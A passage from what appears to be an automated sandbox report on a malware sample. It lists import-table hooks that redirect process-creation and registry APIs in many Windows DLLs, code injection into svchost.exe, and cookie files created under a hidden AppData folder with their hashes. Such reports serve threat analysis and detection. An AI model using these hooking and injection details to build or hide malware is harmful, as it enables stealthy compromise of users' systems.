IAT pagefile_0x0000000007490000:+0x289b5 271. entry of authui.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
...
IAT pagefile_0x0000000007490000:+0x289b5 154. entry of audioses.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 139. entry of actioncenter.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 2. entry of syncreg.dll 4 bytes advapi32.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 187. entry of shdocvw.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 91. entry of winspool.drv 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 84. entry of winspool.drv 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
...
IAT pagefile_0x0000000007490000:+0x289b5 155. entry of windows.ui.shell.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 160. entry of inputswitch.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 282. entry of stobject.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 268. entry of stobject.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 27. entry of capauthz.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 147. entry of wlidprov.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 68. entry of provsvc.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 9. entry of filesyncshell64.dll 4 bytes advapi32.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 101. entry of filesyncshell64.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 112. entry of abovelockapphost.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 121. entry of windows.networking.connectivity.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 99. entry of notificationcontroller.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 121. entry of thumbcache.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 116. entry of wpncore.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 283. entry of ntshrui.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 240. entry of applicationframe.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 153. entry of twinui.appcore.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 68. entry of wldp.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 100. entry of windows.immersiveshell.serviceprovider.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 530. entry of twinui.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
...
IAT pagefile_0x0000000007490000:+0x289b5 570. entry of twinui.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 79. entry of profext.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 681. entry of explorerframe.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 112. entry of sndvolsso.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 104. entry of sndvolsso.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 98. entry of tokenbroker.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 85. entry of tokenbroker.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
...
IAT pagefile_0x0000000007490000:+0x289b5 98. entry of settingsynccore.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 47. entry of settingsyncpolicy.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 116. entry of twinapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 81. entry of winmmbase.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 110. entry of winmm.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 110. entry of coreuicomponents.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 69. entry of webio.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 154. entry of wininet.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 166. entry of wininet.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 489. entry of comctl32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 51. entry of msi.dll 4 bytes advapi32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
...
IAT pagefile_0x0000000007490000:+0x289b5 236. entry of srchadmin.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 187. entry of urlmon.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 166. entry of urlmon.dll 4 bytes kernel32.dll:CreateProcessA+0x0 now points to pagefile_0x0000000007490000:+0x316b8
...
IAT pagefile_0x0000000007490000:+0x289b5 92. entry of settingmonitor.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 39. entry of networkstatus.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 56. entry of shacct.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 56. entry of wlanapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 82. entry of mfplat.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 93. entry of winhttp.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 84. entry of policymanager.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 55. entry of d2d1.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 116. entry of ucrtbase.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 117. entry of ucrtbase.dll 4 bytes kernel32.dll:CreateProcessA+0x0 now points to pagefile_0x0000000007490000:+0x316b8
...
IAT pagefile_0x0000000007490000:+0x289b5 236. entry of windows.ui.immersive.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 206. entry of windows.ui.immersive.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
...
IAT pagefile_0x0000000007490000:+0x289b5 62. entry of dhcpcsvc.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 30. entry of samlib.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 115. entry of iertutil.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
...
IAT pagefile_0x0000000007490000:+0x289b5 126. entry of iertutil.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 143. entry of iertutil.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 229. entry of propsys.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 87. entry of mmdevapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 135. entry of mrmcorer.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 103. entry of dxgi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 129. entry of es.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 154. entry of es.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 71. entry of d3d11.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 235. entry of hgcpl.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 91. entry of dwmapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 39. entry of ninput.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 54. entry of bcp47langs.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 61. entry of apphelp.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 126. entry of twinapi.appcore.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 307. entry of uxtheme.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 39. entry of rmclient.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 124. entry of dnsapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 93. entry of userenv.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 64. entry of profapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 50. entry of powrprof.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 236. entry of windows.storage.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 245. entry of windows.storage.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 215. entry of windows.storage.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
...
IAT pagefile_0x0000000007490000:+0x289b5 113. entry of shcore.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Create Remote Thread #11: c:\windows\system32\svchost.exe 0x1c4 address = 0x7ff977f39fa0 True 1
Fn
Modify Memory #11: c:\windows\system32\svchost.exe 0x1c4 address = 0x7ff977f39fa0, size = 4 True 2
Fn
Data
Modify Memory #11: c:\windows\system32\svchost.exe 0x1c4 address = 0x7490000, size = 1257472 True 1
Fn
Modify Memory #11: c:\windows\system32\svchost.exe 0x1c4 address = 0x4760000, size = 792 True 1
Fn
Data
Modify Control Flow #11: c:\windows\system32\svchost.exe 0x1c4 os_tid = 0xb40, address = 0x0 True 1
Fn
Created Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5AV8L20N.txt 0.33 KB MD5: 296d887b58e5ef72cba662dc9e71e600
SHA1: 04695b299c9b54ab8c694bf9fd986b20b9e09931
SHA256: 6909734c0f752dc11a7972fd04c7f7e59076a84fd9df44dffaa084483ee64631
SSDeep: 6:37IpLkTNyTlQgwXeKwYOUQe/XnJeMehd/qCYVTJh0z4xswT4lVRXn:3E9kTNyRdwXV2s/oX/3kTJh0z4KwT+TX 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MBJX4MYA.txt 0.20 KB MD5: e939180a8bff9e08419c60841301c2ae
SHA1: 96d0d00bafdcae91c8e4603d0b1e5465be4a7e71
SHA256: 68491399f80f0d0481a90cd3e42834262b21465a7784a98760d8293ff83b4206
SSDeep: 6:KRX8WWXiM2scKvYXyISWRX8WWXiL3ogXn:qX0XiMyKvYXbSWX0XiL3ogXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\DRDF2EZX.txt 0.09 KB MD5: e478700e454e0bb1742a70f00207df1d
SHA1: 33af30eadb826320c12c054ebd13a61edf44e8f5
SHA256: 7a8db261e58781982babaa6c592a34d5c1c78445b540e3928ffa85b528cdb813
SSDeep: 3:5AHKWqkUVZsHdyKvXv7Yew7Sd3vWJBSlYyZ0vXn:NWqdDsHc8NaBSlTkXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\DN8YUCVA.txt 1.34 KB MD5: 439e180784d9ee72582c7403a9a43832
SHA1: 49c18f3e224df6b26526c747337ce25cd60e3704
SHA256: a1cca4a3435c45936cb9061096683e48bb52ee30646ba633448edbecbfd81fca
SSDeep: 24:idTEwXUIx+vnXAizQ7vnXX5xJRsJIwTNYisGENLjmQHhhi8GClSeX53WfU3smzfc:idYwXUIwvnXPzCvnXXLA6MpsGEtLHhQf 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\PF9HBAFQ.txt 0.17 KB MD5: cb328f47b7e47d1b54f67ed63f9e3a0b
SHA1: f1d8f17b35e4ed673b94842d64c0032489099024
SHA256: 3fe1e920f4f285b764364522495178595edd3e69291d2557a0715a7e5ee8d323
SSDeep: 3:uWviTSsR3ur9cWTiILEVtyn8UoYtu0dXv6NuRVmERvUVYrEavXn:uWa2sQrlTatynfKERYVKrEkXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9XACNSYG.txt 0.65 KB MD5: d0129961ebfe50fa6ca75d21eb61e3a4
SHA1: d27b99f26b21b15b3596543c71dc9c90bcda9b19
SHA256: e806c3f694373d51d383c0c751000397134ae24b0ed1ebea86022e84acde3d90
SSDeep: 12:Sx7DM959MgXARZuYuDM862BXTOXGyPgfdYdpwmDM9koTjgwXBvDj3DM9b7wX8xvN:4c3XARZM/62BXTJsyYrD8TLXBv3xXS2e 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1UYN2RFY.txt 0.27 KB MD5: 239b092bd838a2d2f1852b9a380793c0
SHA1: 1e5f869c84c922150d17126b8c9cc55175aefd65
SHA256: a2d94374e0a07bc6af6178e95c624b7de86aab9df31f6a24871849261fe6ba55
SSDeep: 6:AWDtJuDK7SWZKSYvdTUQp6Xs2jogLPOfUdtvzN46Ec6jYGMRW2dTSOXn:AcuDK7SW0BFwNXF3PO8dtrN46p6MXWYB 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\HF8F6LU0.txt 0.28 KB MD5: b06bc86eed572b87c6652e8516558501
SHA1: a7b5dbbe8b64096ee17eb1908bdf3c782ee024dd
SHA256: 21278b763254b99be86ccd77ec0935f8fd0604c917ccceef80791861c047c6c0
SSDeep: 6:64X1WIK6hZ1G9wXwqYV94P2kQ1vthZEKrCxWXn:TRjI9wXwq4mRQ11O8Xn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\RQK5QF4L.txt 0.38 KB MD5: ff1bdcd2fb639a27a68b241eabc26573
SHA1: 08d9f85bce5887c701fa17429c926465f07e6ae6
SHA256: 7d17362d4a8e0f61c2190281258dc6d6ec48f730af23a20c21c0cff2f7f67add
SSDeep: 6:BqVsFaI0rIE/ZyoK6XnTE9ZOdNsB6XYHheZb56X7/ZyoR86Xn:BdNE/9K6XnTE9h6XEw6Xr9RxXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\KNJ4AJDH.txt 0.50 KB MD5: e0f4170082366cfaf37f050580d3044d
SHA1: 61e9f235887ebc6804ecd002e9c58d12abe43f63
SHA256: 83bd2d32da76ba4b3fb27c9a9b11d9d359355b5cbdade0f4986625287382d110
SSDeep: 12:m2K9t1qXp7I5vXP4iH5vX62IAc7XBIHcsqXn:Ct1qXpCXP4iFX62IAgXYqXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\PK3I34UV.txt 0.22 KB MD5: fa464e981ce1d1d351998269931ffd2c
SHA1: b9ce7e6bcbb56f43fa85297671a7d07389cd532b
SHA256: e189fbe9b477f07c3de8b7abe06542171de1792a240c1bc03f953e186c595142
SSDeep: 6:zCAEjrc5jWojhv/MDKopgvXoPNsnbXyh8oYXn:zvjW+lMeopkXYNsnbXyCoYXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\QUMCK8L4.txt 0.08 KB MD5: ba27405cebed532e86e6fcfcc8ede849
SHA1: cf921eb790eab9f69ec1acc3817c197b270071cd
SHA256: 046c98fd7aecebeb00adfc0f90c4b3655ba07b5d53664370f9c5162664e36c68
SSDeep: 3:FJXDQ/+T1hGgKvXI+YUSfYMJjXQWj7CvXn:7XDQU1QguwfjQWjwXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\ISTFXHHR.txt 0.32 KB MD5: 5167dd813fd6448a9c120a383ee4d4e0
SHA1: 906d81e4d3497dd2286dc3ab80c8e4387c168e93
SHA256: 59963576ba60900e26c05c1999932a1141dcbf7c67f259e9e0f1d4661227fd3d
SSDeep: 6:6BnqzmMvet/UXqA/9heMvet/UXWJHWROjIkBZheMvet/UXn:orMvK/UXgMvK/UXWJ22IiheMvK/UXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1L3KU69N.txt 0.11 KB MD5: 54f508f03342add430e180d6dbcb3d3d
SHA1: b6cbe338c7e6e6f25bdb955d8c434e9a0cca65e5
SHA256: b5af007818eb027a9106fa34f0c17b373f4b76c8723eab7dbc1dbc3f9d0d46db
SSDeep: 3:Hw7I+WHcDTMcAHcEgR5viMjxRdZ78XBatvCvXn:HwcdHVcAVgRwMjb6Xn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\OOUVZSZN.txt 0.16 KB MD5: b76f6a7898e30e10f2573da67930e365
SHA1: 6ed68335f5314ed6cc5c071f523719f4182f6fdf
SHA256: b1bf16fe6e97ff019a2e66a585bb246a7357db9b766e2dfe02370735b5227a72
SSDeep: 3:zTvqGqW3oZGaRtRMVXJXmm1XPSipSXY0vX2CfhpdVnRQ3KRtRMVXJXmm1XPSiLcX:zOW3o7DMVXZDdvpTWX2mpXVDMVXZDdvq 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\S0EK69P5.txt 0.12 KB MD5: 43d34b584a1f58538d5bafd3afc46c13
SHA1: 570a16fd3636d58181154d81eb871056ae02e706
SHA256: 101b0a83ecb877aa1df5e25876baa8d08d05e8114f26d292194abb2e809e86dc
SSDeep: 3:eXcLIdvKoAqm6z/zv0NMsQLXQJe6ELGav7YfQFDg6dIvXSAktgV0vXn:esLgv+6z/zv0NMsQLAJhJQm6/2WXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5ARQYMIV.txt 0.79 KB MD5: bf408165c746b6f91c2e94516428ce3f
SHA1: f4eba85e0ef065c8c27aa4abcd3cceb797ffc8ca
SHA256: 4e574e952604e1447aa6ab19b59b412e8515a01892f23a01cfb0c418f73a451b
SSDeep: 24:8pKi5UWXHbXuR8jXKWIyMwX6gxWxmwX6fHa0xbnX6kbabYnXQfbL9zfinXn:WBdXHbXuIXKWIHwX6wRwX6f6wnX6kb1R 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\HTVL5WIW.txt 0.11 KB MD5: d228b825d1ae810ff83a16fb6a27d410
SHA1: 18f59e4e7353676e7088cbcae5f4c68e380595f7
SHA256: 5b95c77b52409ac5e99e3da6a5f9d1a333257b9e0241b3ed6e80f9ebf58b3a1a
SSDeep: 3:WXIQ8TRay7mbvj2WLv7YceQ5vUVYrldScUWOVavXn:Wd8wyq6zVKrldvUhkXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\ILF13HLB.txt 0.27 KB MD5: ec239f6ffeb2202bb92f8c9d760a41f0
SHA1: c4d0d9637718bcd0889b2ada1f09aa0c40327808
SHA256: 80af63bb11ee86997800b9b952f7b279becdcd1728fd3592975ac1feb31d50f0
SSDeep: 6:AWI1dfZTkOUugXS5rrqtaNIj1XoxKZTJyIYCXn:IZTkOUugXStr4a8w6TJvrXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\80J4IH0Y.txt 0.09 KB MD5: cc85eeb9c325d0d9f2c8863db4b981f5
SHA1: bbdc8bcaf9f8841c234df6e03c7cc40dd2973275
SHA256: f08b945f6b90082d1dca17d29a0596c9b3489fc6d139c41e003c24335cc6f91e
SSDeep: 3:e9npZtPfAIioKKPv7YeuXJST/dGWVvCvXn:QZBVAIJBVkXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\L78EW25D.txt 0.11 KB MD5: c2b3517e60b42eb30826372db0ca3139
SHA1: 7409416323c74bd2940aa427bc175ae18b3348e9
SHA256: a3f4b18cbc8682d64e3be168817108b8eb094e169f5ec909ea633fbdb076c922
SSDeep: 3:+SQIQ8TRay7mbv2I2FLv7YceQ5vUVYrldNWVTevXn:08wyq+oVKrld8TwXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\JWFWLAYR.txt 0.17 KB MD5: d3464229c025862a45b24654941a9dea
SHA1: c01459638e242ec6de1ca43e3dbca8584e225c1f
SHA256: 90f209194b4e0c46f7d1fd37ecdbccb217498cd6296685c0c821b216296aa549
SSDeep: 3:xRXE1oQITviMzoRvgKwSZdOVTV0vXGTSSmVTSkoNvkoQITviMqDMRvgKyEVkLlC/:kuQlMzoRjZaVZWXGeSmhSk4QlMkMRjHr 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\66I0OJL8.txt 0.09 KB MD5: aee1a01083ef6a58ea22dc1b7235b67a
SHA1: c7b76283f65ac1b6fba6c4696dea692fd7f5a819
SHA256: 6b6b7e5274e117ae63485b7ccf0887d5f75dbd19eba3f84e61a93c4d61f57d9a
SSDeep: 3:ZDaNAtqLSxovXv7YfXveKd0Dl7O5evXn:ZOetZWKdOvXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\0GHTMU6X.txt 0.10 KB MD5: 27ba80dd246a1b4c7dca6d48a42cf9dd
SHA1: 20e67d18a7dda80804ca18d076197515832cf465
SHA256: 987e808573adb84b0148517081d6d3bf12256973fc558293629936bf00dc74b8
